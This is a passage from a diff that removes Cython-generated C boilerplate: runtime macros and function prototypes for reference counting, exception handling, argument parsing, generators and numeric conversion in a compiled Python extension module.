__Pyx_RefNannyFinishContext();\ - PyGILState_Release(__pyx_gilstate_save);\ - } - #define __Pyx_RefNannyFinishContext()\ - __Pyx_RefNanny->FinishContext(&__pyx_refnanny) - #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) - #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) - #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) - #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) - #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) - #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); 
}} while(0) - #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) - #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) -#else - #define __Pyx_RefNannyDeclarations - #define __Pyx_RefNannySetupContext(name, acquire_gil) - #define __Pyx_RefNannyFinishContextNogil() - #define __Pyx_RefNannyFinishContext() - #define __Pyx_INCREF(r) Py_INCREF(r) - #define __Pyx_DECREF(r) Py_DECREF(r) - #define __Pyx_GOTREF(r) - #define __Pyx_GIVEREF(r) - #define __Pyx_XINCREF(r) Py_XINCREF(r) - #define __Pyx_XDECREF(r) Py_XDECREF(r) - #define __Pyx_XGOTREF(r) - #define __Pyx_XGIVEREF(r) -#endif -#define __Pyx_Py_XDECREF_SET(r, v) do {\ - PyObject *tmp = (PyObject *) r;\ - r = v; Py_XDECREF(tmp);\ - } while (0) -#define __Pyx_XDECREF_SET(r, v) do {\ - PyObject *tmp = (PyObject *) r;\ - r = v; __Pyx_XDECREF(tmp);\ - } while (0) -#define __Pyx_DECREF_SET(r, v) do {\ - PyObject *tmp = (PyObject *) r;\ - r = v; __Pyx_DECREF(tmp);\ - } while (0) -#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) -#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) - -/* PyErrExceptionMatches.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) -static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); -#else -#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) -#endif - -/* PyThreadStateGet.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; -#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; -#if PY_VERSION_HEX >= 0x030C00A6 -#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) -#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? 
(PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) -#else -#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) -#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) -#endif -#else -#define __Pyx_PyThreadState_declare -#define __Pyx_PyThreadState_assign -#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) -#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() -#endif - -/* PyErrFetchRestore.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) -#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) -#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) -#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) -#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) -static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); -static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 -#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) -#else -#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) -#endif -#else -#define __Pyx_PyErr_Clear() PyErr_Clear() -#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) -#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) -#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) -#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) -#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) -#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) -#define __Pyx_ErrFetch(type, value, tb) 
PyErr_Fetch(type, value, tb) -#endif - -/* PyObjectGetAttrStr.proto */ -#if CYTHON_USE_TYPE_SLOTS -static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); -#else -#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) -#endif - -/* PyObjectGetAttrStrNoError.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); - -/* GetBuiltinName.proto */ -static PyObject *__Pyx_GetBuiltinName(PyObject *name); - -/* TupleAndListFromArray.proto */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); -static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); -#endif - -/* IncludeStringH.proto */ -#include <string.h> - -/* BytesEquals.proto */ -static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); - -/* UnicodeEquals.proto */ -static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); - -/* fastcall.proto */ -#if CYTHON_AVOID_BORROWED_REFS - #define __Pyx_Arg_VARARGS(args, i) PySequence_GetItem(args, i) -#elif CYTHON_ASSUME_SAFE_MACROS - #define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) -#else - #define __Pyx_Arg_VARARGS(args, i) PyTuple_GetItem(args, i) -#endif -#if CYTHON_AVOID_BORROWED_REFS - #define __Pyx_Arg_NewRef_VARARGS(arg) __Pyx_NewRef(arg) - #define __Pyx_Arg_XDECREF_VARARGS(arg) Py_XDECREF(arg) -#else - #define __Pyx_Arg_NewRef_VARARGS(arg) arg // no-op - #define __Pyx_Arg_XDECREF_VARARGS(arg) // no-op - arg is borrowed -#endif -#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) -#define __Pyx_KwValues_VARARGS(args, nargs) NULL -#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) -#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) -#if CYTHON_METH_FASTCALL - #define __Pyx_Arg_FASTCALL(args, i) args[i] - #define __Pyx_NumKwargs_FASTCALL(kwds) 
PyTuple_GET_SIZE(kwds) - #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) - static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); - #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) - #define __Pyx_Arg_NewRef_FASTCALL(arg) arg // no-op, __Pyx_Arg_FASTCALL is direct and this needs - #define __Pyx_Arg_XDECREF_FASTCALL(arg) // no-op - arg was returned from array -#else - #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS - #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS - #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS - #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS - #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS - #define __Pyx_Arg_NewRef_FASTCALL(arg) __Pyx_Arg_NewRef_VARARGS(arg) - #define __Pyx_Arg_XDECREF_FASTCALL(arg) __Pyx_Arg_XDECREF_VARARGS(arg) -#endif -#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS -#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) -#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) -#else -#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) -#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) -#endif - -/* RaiseArgTupleInvalid.proto */ -static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, - Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); - -/* RaiseDoubleKeywords.proto */ -static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); - -/* ParseKeywords.proto */ -static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, - PyObject **argnames[], - PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, - const char* function_name); - -/* 
PyDictVersioning.proto */ -#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS -#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) -#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) -#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ - (version_var) = __PYX_GET_DICT_VERSION(dict);\ - (cache_var) = (value); -#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ - static PY_UINT64_T __pyx_dict_version = 0;\ - static PyObject *__pyx_dict_cached_value = NULL;\ - if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ - (VAR) = __pyx_dict_cached_value;\ - } else {\ - (VAR) = __pyx_dict_cached_value = (LOOKUP);\ - __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ - }\ -} -static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); -static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); -static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); -#else -#define __PYX_GET_DICT_VERSION(dict) (0) -#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) -#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); -#endif - -/* GetModuleGlobalName.proto */ -#if CYTHON_USE_DICT_VERSIONS -#define __Pyx_GetModuleGlobalName(var, name) do {\ - static PY_UINT64_T __pyx_dict_version = 0;\ - static PyObject *__pyx_dict_cached_value = NULL;\ - (var) = (likely(__pyx_dict_version == __PYX_GET_DICT_VERSION(__pyx_d))) ?\ - (likely(__pyx_dict_cached_value) ? 
__Pyx_NewRef(__pyx_dict_cached_value) : __Pyx_GetBuiltinName(name)) :\ - __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ -} while(0) -#define __Pyx_GetModuleGlobalNameUncached(var, name) do {\ - PY_UINT64_T __pyx_dict_version;\ - PyObject *__pyx_dict_cached_value;\ - (var) = __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ -} while(0) -static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value); -#else -#define __Pyx_GetModuleGlobalName(var, name) (var) = __Pyx__GetModuleGlobalName(name) -#define __Pyx_GetModuleGlobalNameUncached(var, name) (var) = __Pyx__GetModuleGlobalName(name) -static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name); -#endif - -/* PyObjectCall.proto */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); -#else -#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) -#endif - -/* PyFunctionFastCall.proto */ -#if CYTHON_FAST_PYCALL -#if !CYTHON_VECTORCALL -#define __Pyx_PyFunction_FastCall(func, args, nargs)\ - __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) -static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); -#endif -#define __Pyx_BUILD_ASSERT_EXPR(cond)\ - (sizeof(char [1 - 2*!(cond)]) - 1) -#ifndef Py_MEMBER_SIZE -#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) -#endif -#if !CYTHON_VECTORCALL -#if PY_VERSION_HEX >= 0x03080000 - #include "frameobject.h" -#if PY_VERSION_HEX >= 0x030b00a6 && !CYTHON_COMPILING_IN_LIMITED_API - #ifndef Py_BUILD_CORE - #define Py_BUILD_CORE 1 - #endif - #include "internal/pycore_frame.h" -#endif - #define __Pxy_PyFrame_Initialize_Offsets() - #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) -#else - static size_t __pyx_pyframe_localsplus_offset = 0; - #include 
"frameobject.h" - #define __Pxy_PyFrame_Initialize_Offsets()\ - ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ - (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) - #define __Pyx_PyFrame_GetLocalsplus(frame)\ - (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) -#endif -#endif -#endif - -/* PyObjectCallMethO.proto */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); -#endif - -/* PyObjectFastCall.proto */ -#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, (size_t)(nargs), NULL) -static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); - -/* PyIntBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_MultiplyCObj(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyInt_MultiplyCObj(op1, op2, intval, inplace, zerodivision_check)\ - (inplace ? 
PyNumber_InPlaceMultiply(op1, op2) : PyNumber_Multiply(op1, op2)) -#endif - -/* RaiseTooManyValuesToUnpack.proto */ -static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected); - -/* RaiseNeedMoreValuesToUnpack.proto */ -static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index); - -/* IterFinish.proto */ -static CYTHON_INLINE int __Pyx_IterFinish(void); - -/* UnpackItemEndCheck.proto */ -static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected); - -/* PyIntBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_TrueDivideObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyInt_TrueDivideObjC(op1, op2, intval, inplace, zerodivision_check)\ - (inplace ? PyNumber_InPlaceTrueDivide(op1, op2) : PyNumber_TrueDivide(op1, op2)) -#endif - -/* PyIntCompare.proto */ -static CYTHON_INLINE int __Pyx_PyInt_BoolNeObjC(PyObject *op1, PyObject *op2, long intval, long inplace); - -/* ListAppend.proto */ -#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS -static CYTHON_INLINE int __Pyx_PyList_Append(PyObject* list, PyObject* x) { - PyListObject* L = (PyListObject*) list; - Py_ssize_t len = Py_SIZE(list); - if (likely(L->allocated > len) & likely(len > (L->allocated >> 1))) { - Py_INCREF(x); - PyList_SET_ITEM(list, len, x); - __Pyx_SET_SIZE(list, len + 1); - return 0; - } - return PyList_Append(list, x); -} -#else -#define __Pyx_PyList_Append(L,x) PyList_Append(L,x) -#endif - -/* ListCompAppend.proto */ -#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS -static CYTHON_INLINE int __Pyx_ListComp_Append(PyObject* list, PyObject* x) { - PyListObject* L = (PyListObject*) list; - Py_ssize_t len = Py_SIZE(list); - if (likely(L->allocated > len)) { - Py_INCREF(x); - PyList_SET_ITEM(list, len, x); - __Pyx_SET_SIZE(list, len + 1); - return 0; - } - return PyList_Append(list, x); -} -#else -#define __Pyx_ListComp_Append(L,x) PyList_Append(L,x) 
-#endif - -/* GetItemInt.proto */ -#define __Pyx_GetItemInt(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ - (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ - __Pyx_GetItemInt_Fast(o, (Py_ssize_t)i, is_list, wraparound, boundscheck) :\ - (is_list ? (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL) :\ - __Pyx_GetItemInt_Generic(o, to_py_func(i)))) -#define __Pyx_GetItemInt_List(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ - (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ - __Pyx_GetItemInt_List_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ - (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL)) -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, - int wraparound, int boundscheck); -#define __Pyx_GetItemInt_Tuple(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ - (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ - __Pyx_GetItemInt_Tuple_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ - (PyErr_SetString(PyExc_IndexError, "tuple index out of range"), (PyObject*)NULL)) -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, - int wraparound, int boundscheck); -static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j); -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, - int is_list, int wraparound, int boundscheck); - -/* PyObjectCallOneArg.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); - -/* ObjectGetItem.proto */ -#if CYTHON_USE_TYPE_SLOTS -static CYTHON_INLINE PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key); -#else -#define __Pyx_PyObject_GetItem(obj, key) PyObject_GetItem(obj, key) -#endif - -/* PyIntCompare.proto */ -static CYTHON_INLINE int __Pyx_PyInt_BoolEqObjC(PyObject *op1, PyObject *op2, long intval, long inplace); - -/* RaiseUnboundLocalError.proto */ -static 
CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname); - -/* GetException.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_GetException(type, value, tb) __Pyx__GetException(__pyx_tstate, type, value, tb) -static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); -#else -static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb); -#endif - -/* pep479.proto */ -static void __Pyx_Generator_Replace_StopIteration(int in_async_gen); - -/* IncludeStructmemberH.proto */ -#include <structmember.h> - -/* FixUpExtensionType.proto */ -#if CYTHON_USE_TYPE_SPECS -static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); -#endif - -/* FetchSharedCythonModule.proto */ -static PyObject *__Pyx_FetchSharedCythonABIModule(void); - -/* FetchCommonType.proto */ -#if !CYTHON_USE_TYPE_SPECS -static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); -#else -static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); -#endif - -/* RaiseException.proto */ -static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); - -/* GetTopmostException.proto */ -#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE -static _PyErr_StackItem * __Pyx_PyErr_GetTopmostException(PyThreadState *tstate); -#endif - -/* SaveResetException.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_ExceptionSave(type, value, tb) __Pyx__ExceptionSave(__pyx_tstate, type, value, tb) -static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); -#define __Pyx_ExceptionReset(type, value, tb) __Pyx__ExceptionReset(__pyx_tstate, type, value, tb) -static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); -#else -#define __Pyx_ExceptionSave(type, value, tb) PyErr_GetExcInfo(type, value, tb) -#define __Pyx_ExceptionReset(type, 
value, tb) PyErr_SetExcInfo(type, value, tb) -#endif - -/* SwapException.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_ExceptionSwap(type, value, tb) __Pyx__ExceptionSwap(__pyx_tstate, type, value, tb) -static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); -#else -static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb); -#endif - -/* PyObjectCall2Args.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2); - -/* PyObjectGetMethod.proto */ -static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); - -/* PyObjectCallMethod1.proto */ -static PyObject* __Pyx_PyObject_CallMethod1(PyObject* obj, PyObject* method_name, PyObject* arg); - -/* PyObjectCallNoArg.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); - -/* CoroutineBase.proto */ -struct __pyx_CoroutineObject; -typedef PyObject *(*__pyx_coroutine_body_t)(struct __pyx_CoroutineObject *, PyThreadState *, PyObject *); -#if CYTHON_USE_EXC_INFO_STACK -#define __Pyx_ExcInfoStruct _PyErr_StackItem -#else -typedef struct { - PyObject *exc_type; - PyObject *exc_value; - PyObject *exc_traceback; -} __Pyx_ExcInfoStruct; -#endif -typedef struct __pyx_CoroutineObject { - PyObject_HEAD - __pyx_coroutine_body_t body; - PyObject *closure; - __Pyx_ExcInfoStruct gi_exc_state; - PyObject *gi_weakreflist; - PyObject *classobj; - PyObject *yieldfrom; - PyObject *gi_name; - PyObject *gi_qualname; - PyObject *gi_modulename; - PyObject *gi_code; - PyObject *gi_frame; - int resume_label; - char is_running; -} __pyx_CoroutineObject; -static __pyx_CoroutineObject *__Pyx__Coroutine_New( - PyTypeObject *type, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, - PyObject *name, PyObject *qualname, PyObject *module_name); -static __pyx_CoroutineObject *__Pyx__Coroutine_NewInit( - 
__pyx_CoroutineObject *gen, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, - PyObject *name, PyObject *qualname, PyObject *module_name); -static CYTHON_INLINE void __Pyx_Coroutine_ExceptionClear(__Pyx_ExcInfoStruct *self); -static int __Pyx_Coroutine_clear(PyObject *self); -static PyObject *__Pyx_Coroutine_Send(PyObject *self, PyObject *value); -static PyObject *__Pyx_Coroutine_Close(PyObject *self); -static PyObject *__Pyx_Coroutine_Throw(PyObject *gen, PyObject *args); -#if CYTHON_USE_EXC_INFO_STACK -#define __Pyx_Coroutine_SwapException(self) -#define __Pyx_Coroutine_ResetAndClearException(self) __Pyx_Coroutine_ExceptionClear(&(self)->gi_exc_state) -#else -#define __Pyx_Coroutine_SwapException(self) {\ - __Pyx_ExceptionSwap(&(self)->gi_exc_state.exc_type, &(self)->gi_exc_state.exc_value, &(self)->gi_exc_state.exc_traceback);\ - __Pyx_Coroutine_ResetFrameBackpointer(&(self)->gi_exc_state);\ - } -#define __Pyx_Coroutine_ResetAndClearException(self) {\ - __Pyx_ExceptionReset((self)->gi_exc_state.exc_type, (self)->gi_exc_state.exc_value, (self)->gi_exc_state.exc_traceback);\ - (self)->gi_exc_state.exc_type = (self)->gi_exc_state.exc_value = (self)->gi_exc_state.exc_traceback = NULL;\ - } -#endif -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_PyGen_FetchStopIterationValue(pvalue)\ - __Pyx_PyGen__FetchStopIterationValue(__pyx_tstate, pvalue) -#else -#define __Pyx_PyGen_FetchStopIterationValue(pvalue)\ - __Pyx_PyGen__FetchStopIterationValue(__Pyx_PyThreadState_Current, pvalue) -#endif -static int __Pyx_PyGen__FetchStopIterationValue(PyThreadState *tstate, PyObject **pvalue); -static CYTHON_INLINE void __Pyx_Coroutine_ResetFrameBackpointer(__Pyx_ExcInfoStruct *exc_state); - -/* PyObject_GenericGetAttrNoDict.proto */ -#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 -static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); -#else -#define __Pyx_PyObject_GenericGetAttrNoDict 
PyObject_GenericGetAttr -#endif - -/* PatchModuleWithCoroutine.proto */ -static PyObject* __Pyx_Coroutine_patch_module(PyObject* module, const char* py_code); - -/* PatchGeneratorABC.proto */ -static int __Pyx_patch_abc(void); - -/* Generator.proto */ -#define __Pyx_Generator_USED -#define __Pyx_Generator_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_GeneratorType) -#define __Pyx_Generator_New(body, code, closure, name, qualname, module_name)\ - __Pyx__Coroutine_New(__pyx_GeneratorType, body, code, closure, name, qualname, module_name) -static PyObject *__Pyx_Generator_Next(PyObject *self); -static int __pyx_Generator_init(PyObject *module); - -/* GeneratorYieldFrom.proto */ -static CYTHON_INLINE PyObject* __Pyx_Generator_Yield_From(__pyx_CoroutineObject *gen, PyObject *source); - -/* append.proto */ -static CYTHON_INLINE int __Pyx_PyObject_Append(PyObject* L, PyObject* x); - -/* PyIntBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_AddObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyInt_AddObjC(op1, op2, intval, inplace, zerodivision_check)\ - (inplace ? PyNumber_InPlaceAdd(op1, op2) : PyNumber_Add(op1, op2)) -#endif - -/* py_abs.proto */ -#if CYTHON_USE_PYLONG_INTERNALS -static PyObject *__Pyx_PyLong_AbsNeg(PyObject *num); -#define __Pyx_PyNumber_Absolute(x)\ - ((likely(PyLong_CheckExact(x))) ?\ - (likely(__Pyx_PyLong_IsNonNeg(x)) ? (Py_INCREF(x), (x)) : __Pyx_PyLong_AbsNeg(x)) :\ - PyNumber_Absolute(x)) -#else -#define __Pyx_PyNumber_Absolute(x) PyNumber_Absolute(x) -#endif - -/* PyFloatBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyFloat_TrueDivideObjC(PyObject *op1, PyObject *op2, double floatval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyFloat_TrueDivideObjC(op1, op2, floatval, inplace, zerodivision_check)\ - (inplace ? 
PyNumber_InPlaceTrueDivide(op1, op2) : PyNumber_TrueDivide(op1, op2)) -#endif - -/* pybytes_as_double.proto */ -static double __Pyx_SlowPyString_AsDouble(PyObject *obj); -static double __Pyx__PyBytes_AsDouble(PyObject *obj, const char* start, Py_ssize_t length); -static CYTHON_INLINE double __Pyx_PyBytes_AsDouble(PyObject *obj) { - return __Pyx__PyBytes_AsDouble(obj, PyBytes_AS_STRING(obj), PyBytes_GET_SIZE(obj)); -} -static CYTHON_INLINE double __Pyx_PyByteArray_AsDouble(PyObject *obj) { - return __Pyx__PyBytes_AsDouble(obj, PyByteArray_AS_STRING(obj), PyByteArray_GET_SIZE(obj)); -} - -/* pyunicode_as_double.proto */ -#if PY_MAJOR_VERSION >= 3 && !CYTHON_COMPILING_IN_PYPY -static const char* __Pyx__PyUnicode_AsDouble_Copy(const void* data, const int kind, char* buffer, Py_ssize_t start, Py_ssize_t end) { - int last_was_punctuation; - Py_ssize_t i; - last_was_punctuation = 1; - for (i=start; i <= end; i++) { - Py_UCS4 chr = PyUnicode_READ(kind, data, i); - int is_punctuation = (chr == '_') | 